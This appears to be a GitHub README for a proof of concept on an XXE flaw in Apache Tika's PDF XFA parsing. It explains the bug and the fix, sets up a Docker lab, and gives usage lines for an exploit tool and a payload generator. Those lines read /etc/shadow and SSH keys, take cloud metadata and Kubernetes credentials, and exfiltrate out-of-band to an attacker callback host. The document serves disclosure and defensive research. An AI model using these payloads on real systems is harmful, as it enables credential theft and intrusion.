Skip to content

chasingimpact/CVE-2025-66516-Writeup-POC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2025-66516: Critical XXE Vulnerability in Apache Tika

image

Executive Summary

CVE-2025-66516 is a critical XML External Entity (XXE) injection vulnerability in Apache Tika with a CVSS score of 10.0 (maximum severity). The vulnerability allows remote attackers to read arbitrary files, perform Server-Side Request Forgery (SSRF), and exfiltrate sensitive data by uploading a specially crafted PDF document containing malicious XFA (XML Forms Architecture) content.

Attribute Value
CVE ID CVE-2025-66516
CVSS Score 10.0 (Critical)
Disclosed December 4, 2025
Vendor Apache Software Foundation
Affected Product Apache Tika
Attack Vector Network (Remote)
Authentication None Required

Affected Versions

Component Vulnerable Versions Fixed Version
tika-core 1.13 - 3.2.1 3.2.2+
tika-parser-pdf-module 2.0.0 - 3.2.1 3.2.2+
tika-parsers 1.13 - 1.28.5 2.0.0+

Important: This CVE supersedes CVE-2025-54988, which incorrectly identified only the PDF module as vulnerable. The actual vulnerability resides in tika-core.


Technical Analysis

The Vulnerability

The vulnerability is an XML External Entity (XXE) injection flaw in how Apache Tika processes XFA (XML Forms Architecture) data within PDF documents.

The Problem: Tika relies on underlying Java XML parsers (specifically a StAX parser) to read XFA XML content. Vulnerable versions failed to correctly configure the parser to disable external entity resolution. When the parser encounters an external entity request (like SYSTEM "file:///etc/passwd"), it resolves and returns the file contents.

Location: The bug exists in XMLReaderUtils.getXMLInputFactory() in tika-core:

public static XMLInputFactory getXMLInputFactory() {
    XMLInputFactory factory = XMLInputFactory.newFactory();
    tryToSetStaxProperty(factory, XMLInputFactory.IS_NAMESPACE_AWARE, true);
    tryToSetStaxProperty(factory, XMLInputFactory.IS_VALIDATING, false);
    factory.setXMLResolver(IGNORING_STAX_ENTITY_RESOLVER);  // <-- Ineffective
    return factory;
}

The IGNORING_STAX_ENTITY_RESOLVER was intended to block XXE by returning an empty result, but it returned a String instead of the expected InputStream. The JDK's default StAX parser silently ignored this incorrect return type and fell back to default behavior, which resolves external entities.

The Fix (Tika 3.2.2)

The fix explicitly disables DTD and external entity support at the factory level:

tryToSetStaxProperty(factory, XMLInputFactory.SUPPORT_DTD, false);
tryToSetStaxProperty(factory, XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);

Additionally, the resolver was changed to return a proper InputStream type.

The Incidental Woodstox Protection

In the Java ecosystem, multiple XML parser libraries exist. Applications use whichever parser is configured or found first on the classpath.

What is Woodstox? Woodstox is a high-performance, open-source StAX XML parser commonly bundled with Java applications.

How it provides protection: By design (not by accident), Woodstox's implementation correctly handles the XMLResolver return type. When Woodstox receives the string return value from IGNORING_STAX_ENTITY_RESOLVER, it treats it as valid empty content, effectively blocking the XXE.

Critical distinction:

  • tika-server-standard.jar bundles Woodstox - NOT VULNERABLE
  • tika-core + parser modules (embedded usage) does NOT bundle Woodstox - VULNERABLE
  • Applications using JDK's default StAX parser - VULNERABLE

Quick Start

Test the Vulnerability

# 1. Start the lab environment
docker-compose up -d --build

# 2. Test against vulnerable Tika (JDK StAX, port 9997)
python poc/exploit.py --url http://localhost:9997 --check

# 3. Extract /etc/passwd
python poc/exploit.py --url http://localhost:9997 --file /etc/passwd

# 4. Compare with protected Tika (Woodstox, port 9998)
python poc/exploit.py --url http://localhost:9998 --check

Lab Environment

Directory Structure

CVE-2025-66516/
|-- docker-compose.yml              # Lab orchestration
|-- vulnerable-tika/
|   |-- Dockerfile                  # Tika with Woodstox (protected)
|   +-- Dockerfile.jdk-stax         # Tika without Woodstox (VULNERABLE)
|-- webapp/
|   |-- Dockerfile
|   |-- app.py                      # Flask upload application
|   +-- templates/
|-- poc/
|   |-- exploit.py                  # Automated exploitation tool
|   +-- generate_payload.py         # Malicious PDF generator
+-- README.md

Services

Service Port Description
Web Application 8080 Document upload frontend
Tika (Woodstox) 9998 Protected - NOT vulnerable
Tika (JDK StAX) 9997 VULNERABLE - No Woodstox
Attacker Listener 9999 HTTP server for OOB testing

Starting the Lab

docker-compose up -d --build

Proof of Concept Tools

1. Automated Exploitation Tool (exploit.py)

Full-chain exploitation with automatic payload generation and data extraction.

# Check if target is vulnerable
python poc/exploit.py --url http://target:9998 --check

# Read local files
python poc/exploit.py --url http://target:9998 --file /etc/passwd
python poc/exploit.py --url http://target:9998 --file /etc/shadow

# AWS metadata theft (EC2 instances)
python poc/exploit.py --url http://target:9998 --aws-metadata

# Kubernetes secrets
python poc/exploit.py --url http://target:9998 --k8s-secrets

# SSRF to internal services
python poc/exploit.py --url http://target:9998 --ssrf http://internal:8080/admin

# Save extracted data
python poc/exploit.py --url http://target:9998 --file /etc/passwd --save loot.txt

2. Payload Generator (generate_payload.py)

Generates malicious PDF files for manual testing or integration with other tools.

# Generate payload for specific file
python poc/generate_payload.py --target /etc/passwd --output exploit.pdf

# Generate SSRF payload
python poc/generate_payload.py --target http://169.254.169.254/latest/meta-data/ --output ssrf.pdf

# Generate OOB exfiltration payload
python poc/generate_payload.py --target /etc/passwd --callback http://attacker:8080 --output oob.pdf

# Use attack mode presets
python poc/generate_payload.py --mode aws_metadata --output aws.pdf
python poc/generate_payload.py --mode k8s_secrets --all-targets --output ./payloads/

# List available attack modes
python poc/generate_payload.py --list-modes

Available Attack Modes:

  • file_read - Read local files (/etc/passwd, /etc/shadow, etc.)
  • ssh_keys - Steal SSH private keys
  • aws_metadata - AWS EC2 metadata and IAM credentials
  • gcp_metadata - GCP service account tokens
  • azure_metadata - Azure managed identity tokens
  • k8s_secrets - Kubernetes service account credentials
  • webapp_configs - Common web application configs
  • ssrf_internal - Probe internal services

Testing Results

Vulnerable Configuration (JDK StAX - No Woodstox)

Testing against Tika 2.9.2 without Woodstox (simulating embedded deployments):

Test Result
XFA Detection [PASS] PDF recognized as having XFA
XFA Parsing [PASS] XFA content extracted
XXE File Read [VULNERABLE] /etc/passwd contents exfiltrated
XXE SSRF [VULNERABLE] External requests sent

Proof of Exploitation:

<li fieldName="data">data: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Protected Configuration (Woodstox StAX)

Testing against Tika 2.9.2 with Woodstox (standard tika-server-standard.jar):

Test Result
XFA Detection [PASS] PDF recognized as having XFA
XFA Parsing [PASS] XFA content extracted
XXE File Read [BLOCKED] External entities not resolved
XXE SSRF [BLOCKED] No outbound connections

Output shows empty entity:

<li fieldName="data">data: </li>

Conclusion

The vulnerability is real and critical. Exploitation depends on the StAX implementation:

  • [PROTECTED] tika-server-standard.jar - Bundled Woodstox blocks XXE
  • [VULNERABLE] Embedded Tika (tika-core + parsers) - Uses JDK StAX by default
  • [VULNERABLE] Custom deployments without Woodstox
  • [VULNERABLE] Enterprise integrations (Elasticsearch, Solr, Alfresco) - Often use embedded Tika

XXE Attack Capabilities

XXE is fundamentally a file read/SSRF vulnerability, not direct RCE. However, it enables several attack paths:

Direct Attacks

Attack Payload Example
File Read SYSTEM "file:///etc/passwd"
SSRF SYSTEM "http://internal:8080/admin"
AWS Metadata SYSTEM "http://169.254.169.254/latest/meta-data/"

Escalation to RCE

Scenario Attack Path
AWS EC2 XXE -> SSRF to metadata -> IAM credentials -> AWS CLI RCE
Kubernetes XXE -> Read service account token -> kubectl exec
Internal Jenkins XXE -> SSRF to script console -> Groovy RCE
Database XXE -> Read config files -> Database access
SSH XXE -> Read SSH keys -> Remote shell access

Remediation

Immediate Actions

  1. Upgrade Apache Tika to version 3.2.2 or later

    <dependency>
        <groupId>org.apache.tika</groupId>
        <artifactId>tika-core</artifactId>
        <version>3.2.2</version>
    </dependency>
  2. Verify all Tika components are updated (tika-core AND parser modules)

Risk Assessment

Deployment Type Risk Level
tika-server-standard.jar LOW - Woodstox mitigates
Embedded Tika (library usage) HIGH - Likely vulnerable
Custom without Woodstox HIGH - Vulnerable

Defense in Depth

  1. Input Validation - Validate uploaded file types
  2. Network Segmentation - Isolate Tika processing
  3. Least Privilege - Minimal filesystem permissions
  4. Monitoring - Alert on unusual file access

Research Journey

Issues Encountered

Issue 1: Initial exploit did not work

  • XFA was detected but XXE never triggered
  • Spent time debugging payload structure

Issue 2: Multiple XML declarations error

  • Error: WstxParsingException: Illegal processing instruction target ("xml")
  • Cause: XFA streams were each including XML declarations
  • Fix: Only include declaration in preamble, not sub-streams

Issue 3: The Woodstox mystery

  • All payloads failed against tika-server-standard.jar
  • Discovered Woodstox was bundled and blocking XXE
  • Created Dockerfile.jdk-stax to test without Woodstox

Issue 4: Testing wrong configuration

  • Wasted time on protected configuration
  • Lesson: Understand the full dependency tree before testing

Lessons Learned

  1. CVSS scores need context - Environmental factors affect exploitability
  2. Test minimal configurations - Don't assume bundled dependencies
  3. XML parsers vary wildly - Same code behaves differently with different parsers
  4. Embedded != Server - Library usage often has different dependencies
  5. Error messages are clues - Parser exceptions reveal implementation details

References

Timeline

Date Event
August 2025 CVE-2025-54988 disclosed (incomplete scope)
December 4, 2025 CVE-2025-66516 published (full scope identified)
December 4, 2025 Apache Tika 3.2.2 released with fix

Disclaimer

This lab environment and proof-of-concept code are provided for authorized security testing, educational purposes, and defensive research only.

Do not use these tools against systems without explicit written authorization.

License

This research material is provided for educational purposes. Use responsibly.

About

CVE-2025-66516 working exploit, scanner, explanation.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published